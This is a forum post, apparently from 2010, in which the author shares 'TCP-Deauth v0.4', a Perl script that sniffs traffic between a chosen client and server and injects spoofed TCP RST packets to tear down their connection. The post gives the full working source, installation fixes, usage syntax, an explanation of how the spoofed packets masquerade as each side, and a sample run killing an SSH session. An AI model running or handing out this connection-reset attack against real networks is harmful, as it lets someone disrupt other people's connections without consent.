Thread: TCP-Deauth v0.4

Threaded View

Just burned his ISO

Default TCP-Deauth v0.4

Hi. I write this small Perl script during my researh on the TCP/IP protocol. It disconnect a host from a server, all is in the usage.

Code:
    #!/usr/bin/perl

use Net::RawIP;

print "[TCP-Deauth v0.4] Exploit by azert0x\n"."=" x 36 ."\n"; ($eth, $cip, $sip, $sport) = @ARGV;
    die "Usage: ./$0 [interface] [client ip] [server ip] [server port]\n" if @ARGV < 3;
    $n = Net::RawIP->new; print "Waiting for specified network traffic...\n";
    $p = $n->pcapinit($eth, "tcp and src host $sip and dst host $cip and dst port $sport", 1500, 30);
    loop($p, 1, \&tcprst, 0); print "> TCP-Deauth Exploit Done :)\n";

sub tcprst {
      $n->bset(substr $_[2], 14); my ($cport, $ack_seq, $seq) = $n->get({tcp => [qw(source ack_seq seq)]});
      $n->set({ip => {saddr => $cip, daddr => $sip}, tcp => {source => $cport, dest => $sport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $sip:$sport with Acknum $ack_seq and Seqnum $seq\n"; $n->send;
      $n->set({ip => {saddr => $sip, daddr => $cip}, tcp => {source => $sport, dest => $cport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $cip:$cport with Acknum $ack_seq and Seqnum $seq\n"; $n->send;
    }

# azert0x first sploit.
    # Thanks to Perl Underground!
    ----------------------------------

On BackTrack4 the CPAN Perl module Net::RawIP do a segfault, so:

$ sudo perl -MCPAN -e "install Net::RawIP"

and after compilation and (re)installation it works great. Then, run the script as it and you'll see the usage.

$ sudo perl deauth.pl

My script spy the specified client and server network traffic, get the values of ack_seq & seq flags and send to the server, with them, a network packet with the RST flags activate (this RST packet masquerade as the client). If the connection is in ETABLISHED state, my script re-send another RST packet to the client (this RST packet masquerade as the server).

You must obviously be able to sniff the traffic between the targets for my tool works (you should have understood from reading above).

It works in various network environments, not only in localhost!
    But if you work in localhost (127.0.0.1), specify "lo" as network interface.

For example: i've a localhost SSH server and i'm connected to it. I run my Perl script, it waits for network traffic. When i press a key on my SSH shell, i'm disconnected.

azert0x@bt4:~$ sudo perl deauth.pl lo 127.0.0.1 127.0.0.1 22
    [TCP-Deauth v0.4] Exploit by azert0x
    ============================
    Waiting for specified network traffic...
    Sending Spoofed RST to 127.0.0.1:22 with Acknum -131693645 and Seqnum -123819417...
    Sending Spoofed RST to 127.0.0.1:60295 with Acknum -131693645 and Seqnum -123819417...
    > TCP-Deauth Exploit Done :)

I'll update it soon, so please, if you have any problems, bugs or ideas about it, tell them to me. Then gladly i'll work on improvement.
    Last edited by azert0x; 10-15-2010 at 02:29 PM.